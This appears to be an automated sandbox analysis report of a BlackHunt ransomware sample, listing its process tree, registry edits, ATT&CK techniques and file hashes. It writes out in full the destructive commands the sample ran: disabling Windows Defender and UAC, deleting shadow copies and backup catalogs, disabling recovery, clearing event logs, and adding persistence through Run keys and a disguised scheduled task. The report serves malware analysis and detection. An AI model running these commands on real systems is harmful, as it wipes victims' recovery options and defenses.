2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 47 PID 2180 wrote to memory of 2392 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 47 PID 2180 wrote to memory of 2844 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 126 PID 2180 wrote to memory of 2844 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 126 PID 2180 wrote to memory of 2844 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 126 PID 2180 wrote to memory of 2844 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 126 PID 2180 wrote to memory of 2868 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 49 PID 2180 wrote to memory of 2868 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 49 PID 2180 wrote to memory of 2868 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 49 PID 2180 wrote to memory of 2868 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 49 PID 2180 wrote to memory of 2076 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 50 PID 2180 wrote to memory of 2076 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 50 PID 2180 wrote to memory of 2076 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 50 PID 2180 wrote to memory of 2076 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 50 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe"C:\Users\Admin\AppData\Local\Temp\8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2180 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:2460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1424
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2348
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2796
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2868
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2764
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:308
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe" /F2⤵PID:1968
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe" /F3⤵
- Creates scheduled task(s)
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1332
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2112
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2940
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1916
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2984
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2996
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:268
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:788
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1484
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵
- Modifies registry class
PID:2256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3284
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3180
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2264
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3012
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3364
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3608
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3228
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3148
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3636
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3548
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3552
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3304
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3812
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3276
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3240
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3560
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3632
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3720
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:964
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe"2⤵
- Deletes itself
PID:3828 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2668
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3364
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3408
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD55b37f0efa0c34b4757af2bc5b42f8fbf
SHA1d1ef872bdda48b3b6b5e5474bf8207e0986240c1
SHA256151897d87f9e2c56711e11167990cb3445191cd99a5b01b41364640f4bff934b
SHA5129819355269f6c1f5b00f2f2e535e744301b01f3443996dc4a46ed41bb6154e8ad4bfa37867791db38b40625a20caff3d398784bb25715f64193792832a61cf22
-
Filesize
684B
MD53e3899244753974cbb4574533e0802f5
SHA11527a6448c42e41c9962ca1efac7eea2519be0ca
SHA256d52f41daee453cd0877be2dcdea699f67c59dd4de6077c666dbdb3ec2d2d585e
